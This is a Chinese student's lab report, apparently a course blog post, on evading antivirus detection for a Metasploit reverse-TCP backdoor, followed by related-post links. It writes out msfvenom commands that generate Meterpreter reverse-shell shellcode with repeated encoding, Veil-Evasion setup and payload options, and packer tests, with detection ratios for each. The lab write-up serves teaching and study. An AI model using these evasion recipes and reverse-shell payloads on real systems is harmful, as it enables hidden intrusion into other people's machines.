Exp3 MAL_免杀原理与实践

本次实验操使用Virustotal,VirScan作为测试平台,尝试通过Veil-Evasion重新,交叉编译,加壳等方式逃过杀软检测。

实验内容

实验环境 Kali linux 64bit(虚拟机)

实验工具Virustotal,VirScan,Visual Studio

对msf生成后门程序的检测

采用Exp2中msf平台生成的反弹端口后门Hearthstone_backdoor.exe作为第一版对比。

Virustotal测试Ⅰ

Virustotal集成了60多个商业杀毒软件的扫描引擎。可以上传免杀处理过的程序进行检测。

由上图可见,

File Name: Hearthstone_backdoor.exe

Detection Ratio: 21/66

报毒率比想象中低了一些,不过依旧是被主流杀软报毒了。

Visscan测试Ⅰ

Visscan中的 ++文件行为分析++ 很实用,毕竟是中文很亲切。

行为描述:

建立到一个指定的套接字连接

详情信息:

IP: **.168.233.**:4444, SOCKET = 0x000000c4

行为描述:

修改注册表

删除注册表键值

删除注册表键

基本上查出了后台的反弹端口特征。

n次编码影响测试

n = 8时,如图示Visscan给出警告,但没有文件行为分析!

VirusTotal分析结果:

File Name: Hearthstone_backdoor_encoded8.exe

Detection Ratio: 19/66

Veil-Evasion应用

Veil-Evasion是用其他语言如c,c#,phython,ruby,go,powershell等重写了meterperter,然后再通过不同方式编译成exe,共性特征比较少。

++安装方法见知识点++

 Language:		powershell

 Payload:		powershell/meterpreter/rev_tcp

 Required Options:      LHOST=192.168.xxx.xxx  LPORT=4444

可以看到Veil-Evasion提供不同的编程语言以及payload对后门进行封装。

	Rating:		c/python = Excellent ruby/go = normal

	Description:    pure windows/meterpreter/reverse_tcp stager, no

	                shellcode

Virscan测试

  • ruby
Rating: 3/39

//效果客观

  • powershell

    大兄弟还没测试就被电脑管家查出来了……

Rating: 5/39

Visual Studio2017 + shellcode生成后门

生成一个c语言格式的Shellcode数组

root@Kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.xxx.xxx LPORT=xxx -f c

设计程序系统调用该shellcode数组

运行结果——成功√

Windows Defender + 电脑管家 无报毒

Rating: 5/39

shellcode进化

root@Kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai x86/bloxer -i 12 LHOST=192.168.119.130 LPORT=443 -f c

//尝试两种编码 + 重编12次

实测连接成功√

  • virscan测试 效果极佳
Rating: 2/39

主要思路

Tip:

本次实验,主机通过设计反弹端口攻击,达到获取被控机权限的目的。

知识点

Kali下安装Veil-Evasion

//安装git:

sudo apt-get -y install git

//git命令行下载Veil Evasion:

git clone https://github.com/Veil-Framework/Veil-Evasion.git

//把它移动到opt目录下(可选):

mv Veil-Evasion /opt

//进入Veil Evasion所在目录:

cd /opt/Veil-Evasion/

//启动setup脚本开始安装:

bash setup/setup.sh -s

最后的进化--加壳

尝试用ASPack加密Hearthstone_backdoor.exe

压缩后,文件由17.5MB压缩至11.7MB

Rating: 4/39

效果惊人,怪不得冰河用的ASPack压缩。

加密壳Hyperion,在Kali里有hyperion的实现,将shellcode_v2用Veil-Evasion中的Hyperion组件加壳

Rating: 12/39
  • 事实证明,加壳软件起了反作用…
  • 大部分AV应该都增加了壳检测(凉

启发

本次实验给我的启发是,网络环境并没有想象中那么安全,杀软的检测并没有想象的完备。

对于反杀

NOTE:

一个后台程序,通过不同的平台和编码方式,以及重编码,可以减少特征码被检测率。

2017-2018 Exp3 MAL_免杀原理与实践 20155214的更多相关文章

  1. Exp3:MAL_免杀原理与实践

    目录 1.实验环境 2.实践内容 2.1 msfvenom 2.1.1 msfvenom直接生成 2.1.2 msfvenom 编码一次 2.1.3 msfvenom 编码多次 2.2 Veil_ev ...

  2. 2017-2018-2 20155303 『网络对抗技术』Exp3:免杀原理与实践

    2017-2018-2 20155303 『网络对抗技术』Exp3:免杀原理与实践 --------CONTENTS-------- 1. 免杀原理与实践说明 实验说明 基础问题回答 2. 使用msf ...

  3. 2017-2018-2 20155228 《网络对抗技术》 实验三:MAL_免杀原理与实践

    2017-2018-2 20155228 <网络对抗技术> 实验三:MAL_免杀原理与实践 实验内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasi ...

  4. 2018-2019-2 20165316 『网络对抗技术』Exp3:免杀原理与实践

    2018-2019-2 20165316 『网络对抗技术』Exp3:免杀原理与实践 一 免杀原理与实践说明 (一).实验说明 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件, ...

  5. 20145308 《网络对抗》 MAL_免杀原理及实践 学习总结

    20145308 <网络对抗> MAL_免杀原理及实践 学习总结 实践内容 (1)理解免杀技术原理 (2)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免 ...

  6. 2018-2019-2 网络对抗技术 20165324 Exp3:免杀原理与实践

    2018-2019-2 网络对抗技术 20165324 Exp3:免杀原理与实践 免杀原理及基础问题回答 免杀 1. 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. ...

  7. 2018-2019-2 20165209 《网络对抗技术》Exp3:免杀原理与实践

    2018-2019-2 20165209 <网络对抗技术>Exp3:免杀原理与实践 1 免杀原理与实验内容 1.1 免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中 ...

  8. 2017-2018-2 『网络对抗技术』Exp3:免杀原理与实践

    1. 免杀原理与实践说明 一.实验说明 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧:(1.5分) ...

  9. 20155229《网络对抗技术》Exp3:免杀原理与实践

    实验预习 免杀: 看为一种能使病毒木马避免被杀毒软件查杀的技术. 免杀的分类: 开源免杀:指在有病毒.木马源代码的前提下,通过修改源代码进行免杀.. 手工免杀:指在仅有病毒.木马的可执行文件(.exe ...

随机推荐

  1. 移动设备 小米2S不显示CD驱动器(H),便携设备,MTP,驱动USB Driver,MI2感叹号的解决方法

    小米2S不显示CD驱动器(H),便携设备,MTP,驱动USB Driver,MI2感叹号的解决方法 by:授客 QQ:1033553122 用户环境 操作系统:Win7 手机设备:小米2S   问题描 ...

  2. css+div页面布局

    div标签是html页面中用于分组的块元素,是专门用于元素布局的标签. 标签的级别: 1.行级标签:可设置大小,但一行只能容下一个行级标签(默认宽度==页面宽度,默认高度==填充高度) 2.块级标签: ...

  3. 光杆mdf文件的导入

    场景,准备学习SSAS的时候,按照教程在微软下载了示例数据库AdventureWorksDW2012,下载来才发现只有一个mdf文件. 正好今天群里有位兄弟也碰到差不多的问题,客户数据库里的ldf文件 ...

  4. MySQL索引选择不正确并详细解析OPTIMIZER_TRACE格式

    一 表结构如下: CREATE TABLE t_audit_operate_log (  Fid bigint(16) AUTO_INCREMENT,  Fcreate_time int(10) un ...

  5. [Redis_1] Redis 介绍 && 安装

    0. 说明 Redis 介绍 && 安装 1. Redis 介绍 2. Redis 安装(Windows 10) [2.1 解压 redis-2.2.2-win32-win64.rar ...

  6. Python学习---Python环境变量安装问题0907

    问题背景: 重新安装操作系统后,原来的环境变量丢失[因Python3.5安装目录是E盘,文件还在,只是丢失了环境变量而已,添加即可] 问题解决: 方法一:使用cmd命令添加path环境变量 在cmd下 ...

  7. 【转】MySQL双主一致性架构优化

    [原文]https://www.toutiao.com/i6594414914838725133/ 一.双主保证高可用 MySQL数据库集群常使用一主多从,主从同步,读写分离的方式来扩充数据库的读性能 ...

  8. npm安装vue

    目录 npm安装vue Vue.js 是什么 直接用script引入 安装vue 对不同构建版本的解释 安装命令行工具 (CLI) 安装cnpm 安装vue-cli 新建vue项目 运行服务 目录结构 ...

  9. /etc/sudoers文件的分析以及sudo的高级用法

    高级用法总结: sudo命令是普通用户的提权操作指令.在权限控制中,我们可以使用/etc/sudoers文件中来进行设置.基本的用法比较熟悉.比如设置一个普通用户可拥有root用户的运行权限,那么设置 ...

  10. linux安装mydumper软件包以及报错解决

    今天使用mydumper命令从AWS上的RDS集群MYSQL数据库导出数据,发现Tidb官方提供的工具不太适合,所以就自己编译了一个来尝试一下,居然成功了. 首先我的系统是Centos7,并且已经安装 ...